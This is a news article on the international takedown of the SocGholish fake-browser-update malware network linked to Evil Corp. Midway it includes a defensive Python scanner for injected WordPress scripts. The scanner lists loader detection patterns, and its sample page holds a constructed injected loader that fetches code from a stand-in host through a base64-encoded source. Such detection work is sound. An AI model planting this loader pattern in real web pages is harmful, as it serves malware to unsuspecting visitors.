SocGholish Takedown: 14,971 WordPress Sites Cleaned, Evil Corp Hit

Four countries, 106 servers seized, nearly 15,000 hijacked sites scrubbed. The fake-update pipeline goes dark.

An international law enforcement coalition has struck one of the most notorious crimeware operations on the planet — not by arresting it, but by pulling the malware out from under it.

Police from the Netherlands, Germany, the United States and Canada have disrupted SocGholish, the malware network that the suspected Russia-based cybercrime group Evil Corp uses to plant its first foothold inside victim systems.

The action is the latest phase of Operation Endgame, the international anti-cybercrime campaign launched in 2024 and billed as the largest of its kind. Earlier phases tore down some of the most prolific malware loaders in the ecosystem.

SocGholish is not ransomware. It is a JavaScript downloader — also known as FakeUpdates — that hijacks legitimate websites and tricks visitors into running a fake browser update. Install the update, and the malware opens a door. Usually what comes through it is ransomware.

The entry point is the website itself. The operators break into legitimate WordPress sites, usually through leaked admin credentials or vulnerable plugins, inject malicious JavaScript into them, and let that script serve visitors the fake browser update prompt.
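As an added example (not code from the article, Proofpoint, the police or anyone else the page cites), here is a small Python scanner for the kind of injection described above. It checks WordPress theme and plugin files, or any dumped page and post content, for script tags that load from a host other than the site's own or an allowlist, plus inline scripts carrying common loader markers. The heuristics, host names, allowlist and sample page are assumptions constructed for illustration, not indicators from this operation.

```python
import os
import re
from urllib.parse import urlparse

# <script> tags and their src attribute. Running this over raw PHP works too:
# injected tags usually sit in echoed strings or template markup.
SCRIPT_TAG = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.IGNORECASE | re.DOTALL)
SRC_ATTR = re.compile(r"""(?<![\w-])src\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)

# Markers typical of injected loaders (assumed heuristics, not signatures from
# the takedown): decoding and dynamic script insertion inside inline JS.
INLINE_MARKERS = [
    ("eval", re.compile(r"\beval\s*\(")),
    ("atob", re.compile(r"\batob\s*\(")),
    ("fromCharCode", re.compile(r"String\.fromCharCode")),
    ("hex-escapes", re.compile(r"(?:\\x[0-9a-fA-F]{2}){8,}")),
    ("dynamic-script-loader", re.compile(r"createElement\s*\(\s*['\"]script['\"]\s*\)")),
]


def script_host(src):
    """Hostname a script src would load from. A protocol-relative
    '//host/x.js' is normalised because injections often use that form."""
    if src.startswith("//"):
        src = "https:" + src
    host = urlparse(src).hostname
    return host.lower() if host else None


def scan_html(content, site_host, allowlist=()):
    """Return (kind, detail) findings: scripts loaded from unexpected hosts,
    data: URI scripts, and inline scripts that look like loaders."""
    allowed = {site_host.lower(), *(h.lower() for h in allowlist)}
    findings = []
    for tag in SCRIPT_TAG.finditer(content):
        attrs, body = tag.group(1), tag.group(2)
        src = SRC_ATTR.search(attrs)
        if src:
            raw = src.group(1)
            if raw.lower().startswith("data:"):
                findings.append(("data-uri-src", raw[:40]))
                continue
            # A relative src ("/wp-includes/...") has no host and is the site's own.
            host = script_host(raw)
            if host is not None and host not in allowed:
                findings.append(("external-src", host))
        else:
            hits = [name for name, pat in INLINE_MARKERS if pat.search(body)]
            if hits:
                findings.append(("suspicious-inline", ", ".join(hits)))
    return findings


def scan_tree(root, site_host, allowlist=(), exts=(".php", ".html", ".htm", ".js")):
    """Walk a directory (e.g. wp-content) and map each file with findings to them."""
    results = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(exts):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    findings = scan_html(fh.read(), site_host, allowlist)
                if findings:
                    results[path] = findings
    return results


# Constructed sample page: the site's own jQuery, an allowed analytics vendor,
# one injected remote loader and one injected inline loader. All hosts are
# made-up .example names.
SAMPLE_PAGE = """<html><head>
<script src="https://shop.example/wp-includes/js/jquery/jquery.min.js"></script>
<script src="https://stats.analytics-vendor.example/tag.js"></script>
</head><body>
<p>Welcome to the shop.</p>
<script src="//cdn.update-check.example/js/update.js"></script>
<script>var s=document.createElement('script');
s.src=atob('Ly9jZG4udXBkYXRlLWNoZWNrLmV4YW1wbGUvYi5qcw==');
document.head.appendChild(s);</script>
</body></html>"""

if __name__ == "__main__":
    for kind, detail in scan_html(SAMPLE_PAGE, "shop.example",
                                  allowlist=["stats.analytics-vendor.example"]):
        print(f"{kind}: {detail}")
    # Against a real install (hypothetical path):
    # scan_tree("/var/www/html/wp-content", "shop.example", ["stats.analytics-vendor.example"])
```

Because the injected tag often lives in the database rather than on disk, the same `scan_html` function can be pointed at a `wp db export` dump or at exported post content; the allowlist is the part that needs care, since a site's legitimate third-party scripts (analytics, fonts, payment widgets) are exactly where an unfamiliar host hides.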

Proofpoint, which tracks the operators as TA569 and supplied intelligence for the takedown, calls the group the “grandfather” of the web-inject threat: TA569 popularized the technique before copycats such as ClearFake, ZPHP and ErrTraffic followed.

Authorities took down 106 servers and domains and scrubbed malware from 14,971 infected WordPress sites. The Shadowserver Foundation, which ran victim notification, logged more than 1.44 million compromised WordPress sites available to SocGholish between May 2023 and May 2026 — across 1.13 million domains, 271,176 IP addresses, and 187 countries.

With more than 43% of all websites online running WordPress, the adversaries tailored their campaigns to WordPress site owners. According to authorities, SocGholish amassed login credentials for roughly 1.4 million sites. The infected sites included the web pages of restaurants and auto repair shops.

Infoblox, also part of the operation, reported that 55% of its cloud customers were exposed to SocGholish in 2026. “SocGholish is not a niche threat,” said Dr. Renée Burton, the firm’s vice president of threat intelligence. Most of those contacts never became infections: a traffic-filtering layer screens out researchers and bots and routes only chosen targets to the fake update. That filtering is why the operation was able to hide in plain sight for years.

“With these actions we deprive cybercriminals of access to infected computer systems,” said Maikel Rollman of the Netherlands National High Tech Crime Unit. He called the takedown the beginning of further action against SocGholish, not the end.

The FBI Cyber Division, which took part in the operation, framed SocGholish as an initial-access threat, saying the malware establishes a foothold on victim computers, folds those machines into a botnet and gives threat actors a launch pad for ransomware campaigns and espionage. The bureau also issued a June 18 IC3 alert warning that malicious traffic-distribution systems can redirect users from legitimate websites to malware, phishing pages and network-access schemes.

The US Treasury sanctioned the group in 2019, tying its Dridex banking malware to more than $100 million in theft across 40-plus countries and putting a $5 million bounty on its leader, Maksim Yakubets. The US, UK and Australia widened the net in 2024, naming more members and a reported “Dridex 2.0.”

By Infoblox’s account, a 2022 Mandiant report found that Evil Corp — tracked then as UNC2165 — drew its initial access almost exclusively from TA569’s SocGholish.

Among the actions was a mass cleanup of the infected WordPress sites alongside the seizure of the servers used to spread the infection. The Dutch police removed the backdoors from the cleaned sites and notified owners, urging them to rotate credentials, enable multi-factor authentication, delete unknown admin accounts, and keep their installs current.

The traffic-distribution service that funneled victims to SocGholish was not part of the takedown. And Proofpoint warned that past Operation Endgame targets have rebuilt their infrastructure after disruption.

For end users, the tell is the unsolicited update. A real update comes from the browser or the app store, never from a pop-up on a site you happened to visit. SocGholish disguises itself as a necessary update; run it, and you take the payload.

The aim, say authorities, is to cut down on the reach of Evil Corp and its ransomware activities. For now, that reach is smaller. No one is calling it gone.

Shaun Nichols is an IT news journalist. He has spent nearly 20 years covering the industry with a specialty in cybersecurity.

Image by Dok Sev from Pixabay

Shaun Nichols, Senior Editor at Security Point Break, is a veteran cybersecurity journalist who has spent nearly two decades covering the enterprise tech market—from the era of hard-drive iPods to the rise of Agentic AI. Formerly of The Register and TechTarget, Shaun is known for his sharp wit and deep technical dives into malware, ransomware, and the intersection of government policy and security. Follow him on X: @shaundnichols
